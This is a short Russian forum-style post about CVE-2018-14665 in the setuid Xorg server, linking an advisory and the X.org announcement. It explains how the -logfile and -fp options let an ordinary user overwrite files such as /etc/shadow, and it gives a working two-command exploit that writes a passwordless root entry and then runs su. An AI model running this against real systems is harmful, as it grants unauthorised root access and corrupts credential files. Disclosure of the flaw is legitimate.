Не Ъ: https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
https://lists.x.org/archives/xorg-announce/2018-October/002927.html
Ъ: Так как в некоторых системах бинарь Xorg имеет setuid флаг(как sudo, например), то можно задав путь к логу переписать любой файл, например /etc/shadow. Более того, можно задать путь к шрифтам, который логгируется всегда и записать что угодно.
Регрессия появилась в Xorg 1.19.0.
Попробуйте сами:
$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1
$ su
А какой вывод? Лучше не делать suid лишний раз.